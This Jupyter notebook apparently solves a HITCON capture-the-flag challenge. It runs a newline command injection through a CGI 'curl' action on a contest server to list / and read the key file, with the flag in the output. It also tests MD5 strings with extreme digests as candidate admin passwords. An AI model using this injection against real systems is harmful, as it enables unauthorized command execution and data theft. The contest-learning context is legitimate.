In [2]:
import requests
In [10]:
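# Request setup. `headers` and `cookies` are module-level names that the
# next request cell reuses, so they keep their original names.
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {"diagsess":"../etc/passwd"} # doesn't matter
# Command line whose output should come back in the HTTP response.
cmd =" ls /"
# The "curl" action receives `arg` as its argument string. "-w xxx" is curl's
# write-out option and is used here only to emit a recognisable marker. The
# "\n" ends that line, so `cmd` arrives as a separate line. The recorded output
# below (a listing of /) shows that this second line was executed server-side,
# which is consistent with the CGI building a shell command from `arg` without
# rejecting newlines (the handler source is not shown on this page).
# Review note: a handler like this should pass user-supplied arguments as an
# argv list (no shell) and refuse control characters such as "\n".
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
# timeout: without one, requests waits indefinitely on an unresponsive host.
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers, timeout=30)
# Everything after the marker is the command output. str.find() returns -1
# when the marker is missing, which would silently slice from offset 3, so
# that case is reported explicitly instead.
marker = ">xxx"
marker_pos = r.content.find(marker)
if marker_pos == -1:
    print("marker %r not found in response; raw body follows" % marker)
    print(r.content)
else:
    print(r.content[marker_pos + len(marker):])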
bin
boot
dev
etc
home
initrd.img
key.txt
lib
lib64
lost+found
media
mnt
opt
proc
read_key
root
run
sbin
srv
sys
tmp
usr
var
vmlinuz

In [11]:
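# `read_key` and `key.txt` both appear at the filesystem root in the listing
# returned by the previous cell.
cmd = "/read_key /key.txt"
# or use python to read stderr
# cmd = "python -c s=__import__('subprocess');print(s.check_output('/read_key'+chr(32)+'/key.txt',stderr=s.STDOUT,shell=True))"
# Same request shape as the previous cell: the line after "\n" in `arg` is
# the part whose output is returned after the "xxx" marker.
# `cookies` and `headers` come from the earlier request cell, which must have
# been run first.
payload = {"action": "curl", "arg": "aaa -w xxx\n"+cmd}
# timeout: without one, requests waits indefinitely on an unresponsive host.
r = requests.post("http://54.92.127.128:16888/cgi-bin/dana-na.cgi?sechash=", data=payload, cookies=cookies, headers=headers, timeout=30)
# str.find() returns -1 when the marker is missing; report that instead of
# slicing from a meaningless offset.
marker = ">xxx"
marker_pos = r.content.find(marker)
if marker_pos == -1:
    print("marker %r not found in response; raw body follows" % marker)
    print(r.content)
else:
    print(r.content[marker_pos + len(marker):])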
HITCON{a755be06b165ed8fc4710d3544fce942}


In [9]:
# BTW, attempts to find an admin password
# from http://calebmadrigal.com/display-list-as-table-in-ipython-notebook/
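class ListTable(list):
    """List of rows that renders as an HTML table in IPython Notebook.

    Takes a 2-dimensional list of the form [[1,2,3],[4,5,6]]; each inner
    list becomes one <tr> and each element one <td>.

    Cell values are HTML-escaped before they are placed in the markup, so a
    value containing '<', '>' or '&' is shown literally rather than being
    parsed as markup by the notebook front end. This matters when the rows
    hold strings from outside the notebook (here: repr() of arbitrary byte
    strings, one of which contains '<').
    """

    def _repr_html_(self):
        """Return the table markup as one string (IPython rich-display hook)."""
        # Local import keeps the class self-contained and works on both
        # interpreter lines: html.escape on Python 3, cgi.escape on Python 2.
        try:
            from html import escape
        except ImportError:
            from cgi import escape

        parts = ["<table>"]
        for row in self:
            parts.append("<tr>")
            parts.extend(
                "<td>{0}</td>".format(escape("{0}".format(cell), True))
                for cell in row
            )
            parts.append("</tr>")
        parts.append("</table>")
        return ''.join(parts)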
    
from hashlib import md5
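# Candidate plaintexts. In the table output below, each one has an MD5
# hexdigest that starts with a run of 10 to 13 identical '0' or 'f' digits.
# The author's comment at the top of the cell says these were attempts to
# find an admin password; the page does not show how the target compares
# them, so that link is not verified here.
# NOTE: str.decode("base64") is Python 2 only.
L = [
    "djGFYmi", "ZkjAFaaaa",
    "G/I2/vILur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
    "Vf3ppC4Iu74AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA=".decode("base64"),
    "6Za/F6+mur4AAAAAaHR0cDovL2hhc2hjYXQubmV0LwA= ".decode("base64"),
    'Kdr.b4v', 'K1UgX15KGWDJKTdo', 'xIoN=JG',
    'http://weijr-eng.blogspot.com               GE\x00\x00\x0f\xe5\xef\x0b',
    'b81.org/kpoz&AV', 'b81.org/GD9FD&Sa', 'b81.org/S27Mp1Ya',
    'http://weijr-eng.blogspot.com               \xbf\x13\x00\x00\xbd\xae\xcb`',
    'http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4',
    'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c',
]


def _leading_run(digest):
    """Return how many times the first character of `digest` repeats at its start.

    Replaces the inline "first index where neighbours differ, plus one"
    comprehension. It also returns len(digest) for a string made of a single
    repeated character, where the comprehension raised IndexError.
    """
    first = digest[0]
    count = 1
    while count < len(digest) and digest[count] == first:
        count += 1
    return count


# Sorting on the hexdigest puts the '0'-prefixed digests first and the
# 'f'-prefixed ones last, so both extremes sit at the ends of the table.
S = sorted((md5(x).hexdigest(), x) for x in L)
# Last expression of the cell: rendered through ListTable._repr_html_.
ListTable(
    [['Leading 0 or f', 'md5 hexdigest', 'plaintext']]
    + [[_leading_run(digest), digest, repr(plain)] for digest, plain in S]
)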
Out[9]:
Leading 0 or fmd5 hexdigestplaintext
13000000000000079ad03b44781b4e6c59'http://weijr-eng.blogspot.com \xcb<\x00\x00\xf9\xc8P\xd4'
120000000000006c32a237fc882cc44a4b'U\xfd\xe9\xa4.\x08\xbb\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
120000000000008d003b0ffcf6b666342e'xIoN=JG'
1100000000000277ec3301b3cabacb95c9'\x1b\xf26\xfe\xf2\x0b\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
1100000000000639f3eb26b63f0a7baca3'ZkjAFaaaa'
1100000000000b814f9865b26c0ebb4136'Kdr.b4v'
1100000000000ccda838e4b06d6d662dca'djGFYmi'
10000000000016deedb58402856305e702'b81.org/GD9FD&Sa'
10ffffffffffe538aaef4811a59ec8af0f'b81.org/S27Mp1Ya'
10ffffffffffe9b60be6c8e43b80c29582'http://weijr-eng.blogspot.com \xbf\x13\x00\x00\xbd\xae\xcb`'
11fffffffffff5d05f4b93da2870f43376'K1UgX15KGWDJKTdo'
11fffffffffff8821c53918df398cda5d8'b81.org/kpoz&AV'
11fffffffffffd880637cda3008c943ce6'http://weijr-eng.blogspot.com GE\x00\x00\x0f\xe5\xef\x0b'
12ffffffffffff4de6f952846ffc0f4d15'\xe9\x96\xbf\x17\xaf\xa6\xba\xbe\x00\x00\x00\x00http://hashcat.net/\x00'
13fffffffffffff194e10443811b0ca0cd'http://weijr-eng.blogspot.com \x97\xa1\x00\x00T3z\x0c'
In [10]:
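# Save the two extreme entries from the table above: 'md5low' is the input
# whose digest starts with 13 zeros, 'md5high' the one starting with 13 f's.
# The payloads contain NUL and other non-text bytes, so they are written in
# binary mode from bytes literals. This yields the same bytes on Python 2 and
# avoids newline translation or re-encoding on other platforms/interpreters.
with open('md5low', 'wb') as low_file:
    low_file.write(b'http://weijr-eng.blogspot.com               \xcb<\x00\x00\xf9\xc8P\xd4')
with open('md5high', 'wb') as high_file:
    high_file.write(b'http://weijr-eng.blogspot.com               \x97\xa1\x00\x00T3z\x0c')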
In [ ]: